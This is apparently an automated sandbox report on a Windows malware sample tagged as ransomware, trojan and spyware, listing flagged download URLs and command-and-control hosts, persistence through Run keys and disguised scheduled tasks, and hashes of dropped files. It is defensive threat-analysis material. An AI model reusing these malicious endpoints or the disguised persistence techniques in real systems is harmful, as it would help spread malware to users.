                                                                                                                        unknown
                                                                                                                        https://static.xx.fbcdn.net/rsrc.php/v3i7M54/yx/l/en_US/LsRZeEzcd6B.js?_nc_x=Ij3Wp8lg5Kzaafg31.exe, 00000015.00000003.616139527.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.617336652.000001E292381000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.558548528.000001E2922B9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.559523108.000001E29229C000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593963921.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593189980.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E2922CB000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.560301255.000001E29229E000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E292293000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.595112195.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.592730628.000001E292381000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://www.live.com/D804.exe, 00000013.00000003.475244622.00000000032B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://zexeq.com/files/1/build3.exerunb10D804.exe, 00000013.00000002.619178225.000000000062B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: malware
                                                                                                                            unknown
                                                                                                                            http://zexeq.com/raud/get.php?pid=F4B58C92E14ED1DB6A495C4F0112806CgD804.exe, 00000010.00000002.619429561.0000000000852000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                            • Avira URL Cloud: malware
                                                                                                                            unknown
                                                                                                                            • No. of IPs < 25%
                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                            • 75% < No. of IPs
                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                            157.240.9.35
                                                                                                                            star-mini.c10r.facebook.comUnited States
                                                                                                                            32934FACEBOOKUSfalse
                                                                                                                            103.100.211.218
                                                                                                                            jp.imgjeoighw.comHong Kong
                                                                                                                            133115HKKFGL-AS-APHKKwaifongGroupLimitedHKtrue
                                                                                                                            154.221.31.191
                                                                                                                            ss.apjeoighw.comSeychelles
                                                                                                                            133115HKKFGL-AS-APHKKwaifongGroupLimitedHKfalse
                                                                                                                            149.154.167.99
                                                                                                                            t.meUnited Kingdom
                                                                                                                            62041TELEGRAMRUfalse
                                                                                                                            217.174.148.28
                                                                                                                            speedlab.com.egBulgaria
                                                                                                                            31083TELEPOINTBGtrue
                                                                                                                            175.119.10.231
                                                                                                                            zexeq.comKorea Republic of
                                                                                                                            9318SKB-ASSKBroadbandCoLtdKRtrue
                                                                                                                            211.40.39.251
                                                                                                                            unknownKorea Republic of
                                                                                                                            3786LGDACOMLGDACOMCorporationKRtrue
                                                                                                                            157.240.17.17
                                                                                                                            star.c10r.facebook.comUnited States
                                                                                                                            32934FACEBOOKUSfalse
                                                                                                                            211.119.84.112
                                                                                                                            colisumy.comKorea Republic of
                                                                                                                            3786LGDACOMLGDACOMCorporationKRtrue
                                                                                                                            162.0.217.254
                                                                                                                            api.2ip.uaCanada
                                                                                                                            35893ACPCAfalse
                                                                                                                            194.180.48.90
                                                                                                                            unknownGermany
                                                                                                                            10753LVLT-10753UStrue
                                                                                                                            123.140.161.243
                                                                                                                            unknownKorea Republic of
                                                                                                                            3786LGDACOMLGDACOMCorporationKRtrue
                                                                                                                            80.66.203.53
                                                                                                                            shsplatform.co.ukUnited Kingdom
                                                                                                                            61323UKFASTGBtrue
                                                                                                                            188.34.154.187
                                                                                                                            unknownGermany
                                                                                                                            24940HETZNER-ASDEfalse
                                                                                                                            45.9.74.80
                                                                                                                            unknownRussian Federation
                                                                                                                            200740FIRST-SERVER-EU-ASRUtrue
                                                                                                                            211.59.14.90
                                                                                                                            unknownKorea Republic of
                                                                                                                            9318SKB-ASSKBroadbandCoLtdKRtrue
                                                                                                                            188.114.97.7
                                                                                                                            potunulit.orgEuropean Union
                                                                                                                            13335CLOUDFLARENETUStrue
                                                                                                                            188.114.96.7
                                                                                                                            unknownEuropean Union
                                                                                                                            13335CLOUDFLARENETUStrue
                                                                                                                            183.100.39.157
                                                                                                                            unknownKorea Republic of
                                                                                                                            4766KIXS-AS-KRKoreaTelecomKRtrue
                                                                                                                            157.240.234.35
                                                                                                                            unknownUnited States
                                                                                                                            32934FACEBOOKUSfalse
                                                                                                                            222.236.49.123
                                                                                                                            toobussy.comKorea Republic of
                                                                                                                            9318SKB-ASSKBroadbandCoLtdKRtrue
                                                                                                                            222.236.49.124
                                                                                                                            unknownKorea Republic of
                                                                                                                            9318SKB-ASSKBroadbandCoLtdKRtrue
                                                                                                                            IP
                                                                                                                            192.168.2.1
                                                                                                                            Joe Sandbox Version:37.1.0 Beryl
                                                                                                                            Analysis ID:876998
                                                                                                                            Start date and time:2023-05-28 10:41:06 +02:00
                                                                                                                            Joe Sandbox Product:CloudBasic
                                                                                                                            Overall analysis duration:0h 13m 49s
                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                            Report type:light
                                                                                                                            Cookbook file name:default.jbs
                                                                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                            Number of analysed new started processes analysed:43
                                                                                                                            Number of new started drivers analysed:0
                                                                                                                            Number of existing processes analysed:0
                                                                                                                            Number of existing drivers analysed:0
                                                                                                                            Number of injected processes analysed:2
                                                                                                                            Technologies:
                                                                                                                            • HCA enabled
                                                                                                                            • EGA enabled
                                                                                                                            • HDC enabled
                                                                                                                            • AMSI enabled
                                                                                                                            Analysis Mode:default
                                                                                                                            Analysis stop reason:Timeout
                                                                                                                            Sample file name:01860199.exe
                                                                                                                            Detection:MAL
                                                                                                                            Classification:mal100.rans.troj.spyw.evad.winEXE@76/330@105/23
                                                                                                                            EGA Information:Failed
                                                                                                                            HDC Information:
                                                                                                                            • Successful, ratio: 45.2% (good quality ratio 38.6%)
                                                                                                                            • Quality average: 61.8%
                                                                                                                            • Quality standard deviation: 35.8%
                                                                                                                            HCA Information:
                                                                                                                            • Successful, ratio: 100%
                                                                                                                            • Number of executed functions: 0
                                                                                                                            • Number of non-executed functions: 0
                                                                                                                            Cookbook Comments:
                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, dllhost.exe, consent.exe, conhost.exe, svchost.exe
                                                                                                                            • TCP Packets have been reduced to 100
                                                                                                                            • Created / dropped Files have been reduced to 100
                                                                                                                            • Excluded IPs from analysis (whitelisted): 13.89.179.12, 20.189.173.22, 20.42.73.29, 20.189.173.21
                                                                                                                            • Excluded domains from analysis (whitelisted): login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, onedsblobprdwus17.westus.cloudapp.azure.com, onedsblobprdwus16.westus.cloudapp.azure.com, watson.telemetry.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com
                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                            • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                            • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                            TimeTypeDescription
                                                                                                                            10:42:01API Interceptor556x Sleep call for process: explorer.exe modified
                                                                                                                            10:42:34Task SchedulerRun new task: Firefox Default Browser Agent 1D1CF5D964ED7B3F path: C:\Users\user\AppData\Roaming\hwgujdv
                                                                                                                            10:42:40Task SchedulerRun new task: Time Trigger Task path: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe s>--Task
                                                                                                                            10:42:43AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe" --AutoStart
                                                                                                                            10:42:45API Interceptor1x Sleep call for process: D804.exe modified
                                                                                                                            10:42:46API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                            10:42:53AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe" --AutoStart
                                                                                                                            10:42:55Task SchedulerRun new task: Azure-Update-Task path: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                            10:42:58Task SchedulerRun new task: mnolyk.exe path: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe
                                                                                                                            10:42:59API Interceptor571x Sleep call for process: mnolyk.exe modified
                                                                                                                            10:43:09API Interceptor1x Sleep call for process: build2.exe modified
                                                                                                                            10:43:20Task SchedulerRun new task: Firefox Default Browser Agent A259CA271F5868C4 path: C:\Users\user\AppData\Roaming\ewgujdv
                                                                                                                            10:43:34API Interceptor1x Sleep call for process: aafg31.exe modified
                                                                                                                            10:43:50Task SchedulerRun new task: NoteUpdateTaskMachineQC path: C:\Program Files\Notepad\Chrome\updater.exe
                                                                                                                            No context
                                                                                                                            No context
                                                                                                                            No context
                                                                                                                            No context
                                                                                                                            No context
                                                                                                                            Process:C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe
                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 7, database pages 36, 1st free page 10, free pages 1, cookie 0x29, schema 4, UTF-8, version-valid-for 7
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):147456
                                                                                                                            Entropy (8bit):0.7217007190866341
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:kab+d5neKTnuRpHDiEwABBE3umab+QuJdi:kab+dVeK8iEZBBjmab+QuJdi
                                                                                                                            MD5:FEF7F4B210100663DC7731400BAC534E
                                                                                                                            SHA1:E3F17C46A2DB6861F22B3F4222B97DCB5EBBD47A
                                                                                                                            SHA-256:E81118F5C967EA342A16BDEFB28919F8039E772F8BDCF4A65684E3F56D31EA0E
                                                                                                                            SHA-512:6134CC2118FBADD137C4FC3204028B088C7E73A7B985A64D84C60ABD5B1DBFD0AA352C6DF199F43164FEC92378571B5FAC4F801E9AF7BE1DEA8FB6C3C799F695
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:SQLite format 3......@ .......$...........)......................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                            Process:C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe
                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):94208
                                                                                                                            Entropy (8bit):1.2882898331044472
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                                                                                            MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                                                                                            SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                                                                                            SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                                                                                            SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                            Process:C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe
                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 17, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 17
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):28672
                                                                                                                            Entropy (8bit):1.4755077381471955
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:oesz0Rwhba5DX1tHQOd0AS4mcAMmgAU7MxTWbKSS:o+RwE55tHQOKB4mcmgAU7MxTWbNS
                                                                                                                            MD5:DEE86123FE48584BA0CE07793E703560
                                                                                                                            SHA1:E80D87A2E55A95BC937AC24525E51AE39D635EF7
                                                                                                                            SHA-256:60DB12643ECF5B13E6F05E0FBC7E0453D073E0929412E39428D431DB715122C8
                                                                                                                            SHA-512:65649B808C7AB01A65D18BF259BF98A4E395B091D17E49849573275B7B93238C3C9D1E5592B340ABCE3195F183943CA8FB18C1C6C2B5974B04FE99FCCF582BFB
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                            Process:C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe
                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):49152
                                                                                                                            Entropy (8bit):0.7876734657715041
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                                                                                            MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                                                                                            SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                                                                                            SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                                                                                            SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                            Process:C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe
                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):94208
                                                                                                                            Entropy (8bit):1.2882898331044472
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                                                                                            MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                                                                                            SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                                                                                            SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                                                                                            SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                            Process:C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe
                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 7, database pages 36, 1st free page 10, free pages 1, cookie 0x29, schema 4, UTF-8, version-valid-for 7
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):147456
                                                                                                                            Entropy (8bit):0.7217007190866341
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:kab+d5neKTnuRpHDiEwABBE3umab+QuJdi:kab+dVeK8iEZBBjmab+QuJdi
                                                                                                                            MD5:FEF7F4B210100663DC7731400BAC534E
                                                                                                                            SHA1:E3F17C46A2DB6861F22B3F4222B97DCB5EBBD47A
                                                                                                                            SHA-256:E81118F5C967EA342A16BDEFB28919F8039E772F8BDCF4A65684E3F56D31EA0E
                                                                                                                            SHA-512:6134CC2118FBADD137C4FC3204028B088C7E73A7B985A64D84C60ABD5B1DBFD0AA352C6DF199F43164FEC92378571B5FAC4F801E9AF7BE1DEA8FB6C3C799F695
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:SQLite format 3......@ .......$...........)......................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):65536
                                                                                                                            Entropy (8bit):0.8205242041362858
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:eJxorFzUelJoWKixCto07RP6tpXIQcQjc6ieAcElcw3K+HbHg/8BRTf3o8Fa9iVi:1ZUeliWKGHtGZvPjIg/u7sXS274ItL
                                                                                                                            MD5:630663FB4548437CAB9B71A117392776
                                                                                                                            SHA1:428A1A4ED05F4C140B589DE9E5CE379E77A23A44
                                                                                                                            SHA-256:35B2CB67E341CE0D02B479C13C3822EACA1BF1ABE1174D1807E0DB09B4E7EDAC
                                                                                                                            SHA-512:5FD2F30697D0CC13887EBF452770A2FCB7AD761F61D4786F9509F932EE1ECD7EF146C4954C55D75ACC2D29BA11CCFEC03416B88AD861C5183E1CA104AE50CFB1
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.2.9.7.6.9.3.5.9.9.6.3.5.0.9.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.2.9.7.6.9.3.6.0.8.0.7.2.6.2.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.d.8.3.7.3.3.b.-.a.2.b.6.-.4.f.8.b.-.a.4.a.c.-.f.9.4.3.a.4.c.d.6.e.c.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.4.9.4.b.5.0.f.-.4.6.b.a.-.4.a.a.1.-.a.7.7.5.-.3.0.a.a.7.c.6.0.2.f.3.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.C.8.6.1...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.0.4.4.-.0.0.0.1.-.0.0.1.f.-.3.1.0.f.-.c.0.c.b.8.b.9.1.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.a.c.b.e.e.1.8.2.b.3.e.b.b.4.c.3.e.8.b.b.8.c.2.b.a.d.d.e.1.1.1.0.0.0.0.f.b.0.2.!.0.0.0.0.2.d.f.f.9.4.4.f.9.7.0.f.a.e.f.5.c.6.f.a.9.2.a.c.8.f.b.e.8.2.c.9.2.5.1.5.5.3.f.3.!.C.8.6.1...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.3././.0.3././.1.3.:.
                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            File Type:Mini DuMP crash report, 14 streams, Sun May 28 17:42:40 2023, 0x1205a4 type
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):34732
                                                                                                                            Entropy (8bit):2.0489643020598747
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:5V8J288/BlctnoyfBi7eJEnus9DBBLMv58iS3VzwexaeTrvMM4egPe+WI3+IX4IU:4JSUeyfBOeJ+iS3VzrbPMMBgWGJo+9o
                                                                                                                            MD5:822CAB26CD9F624557FCEAC2B8A54E2A
                                                                                                                            SHA1:D9F3FE71FBE434A0E63FC8AA29250153734802A2
                                                                                                                            SHA-256:EA4C92CF376F45CE205D0B8C07B2084BD4AEF2B38C7A88A131698A979283873C
                                                                                                                            SHA-512:68C9EC7024CD3AF6027A3FB05F309F814E32134FC7B8C6B297B4A997662104AAF8E9DEF588FFA7C5B5954EC6A9F685F15685BC5AE54AC588268D04C924864505
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:MDMP....... .........sd.........................................&..........T.......8...........T................r...........................................................................................U...........B......8.......GenuineIntelW...........T.......D.....sd............................. ..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):8364
                                                                                                                            Entropy (8bit):3.6992724605112297
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:Rrl7r3GLNiTT69J6YqGHSUe7gmf9SRpqvCpDp89bKOsfo4um:RrlsNiH6j6Y1HSUagmf9SUKNfV
                                                                                                                            MD5:F4E456151E22006370DF54340A9AB031
                                                                                                                            SHA1:ECDC4E02D11843A25C6E40506E82B5DF7EE049A5
                                                                                                                            SHA-256:CF0CBCC87429765C81C0B8E4CE5E321003576320A3F66EFAE699D7FA8155AADC
                                                                                                                            SHA-512:13ED0EE28704FF51F7364AFDBB21C56D8C278768539A98AA757B1C200AC2CDA8C7517132F9136361737D52B83BCFD78B8A4709409D7EE83DBE745C3A648309CC
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.8.<./.P.i.d.>.........<.
                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):4680
                                                                                                                            Entropy (8bit):4.4629285853594665
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:48:cvIwSD8zs2JgtWI9fjWyWgc8sqYjH8fm8M4JNRjFgs+q8voR7gTEId:uITfM8ygrsqYQJKsKogTEId
                                                                                                                            MD5:A30F7BD601F458CEAB46FD69CF16B469
                                                                                                                            SHA1:5120BA2BCC141226ECAAA855EA4789F4475DC7EC
                                                                                                                            SHA-256:7F6EC29D4DCBC81D6ED5059B848E6A69268700196CDD23DE757FF3D7BA56ECDA
                                                                                                                            SHA-512:AF5DA4DB2C59C502BAC264465CD2BD09CA370AAB4E8253F58FCA5C1C1AB80D54FCFCF1F551AF0B1B41C4E8CB01820223AFA1BC3B7A74AD82835057A8EEF85B79
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="2060813" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):42
                                                                                                                            Entropy (8bit):4.993391529870108
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:2dqkaPvGoFy:2KvG
                                                                                                                            MD5:CAF15C2C1DBEB4F0A6E187F80F2BD109
                                                                                                                            SHA1:461C5511D8DA0C60D8A0E749789D322D376580B4
                                                                                                                            SHA-256:4C37EA89D270FBA2A8EE9CDE1C21CF690DCAAE2E717DD20BC6427DFCFE6234DD
                                                                                                                            SHA-512:AEA59BCE0C2016E99CA20A2BBE5CD50BB9A0D9C9F336587084DF1B03520FA299EB8CEEAB9D4C8858CA636C25443464EAF70CFE7B81EAC9778AD29B21B889CEBD
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:az8OAYewNgELvwQrvCQFNi4j455hRwuI26KpqTgc..
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:data
                                                                                                                            Category:modified
                                                                                                                            Size (bytes):623
                                                                                                                            Entropy (8bit):7.672341084038176
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12:cbTqi+zWsjHDRwNRYrQ1QdEY2iZB5i55NTtIAREVFZjFtPixHfzGEGJcii9a:WTqi0WoRw7H1QWY2iFi53TOTbYHyECbD
                                                                                                                            MD5:82E2E3ACA6EC2416013473A6F9BA61B3
                                                                                                                            SHA1:EDEBF86B5B21E938F7B27821893AD52287A056EE
                                                                                                                            SHA-256:767E13A8A8D96090DCA740ED213EFF855A9551F1805DF52676EE490E3E38222E
                                                                                                                            SHA-512:9EECD1FD4EFB3B6BD5B0D56DB9F4B956A87126B61386224B205037339F686B25E0BD6B44E0668E624A63EEB65442E284B221891FEA46C601EFEF729CEBDDC6F5
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
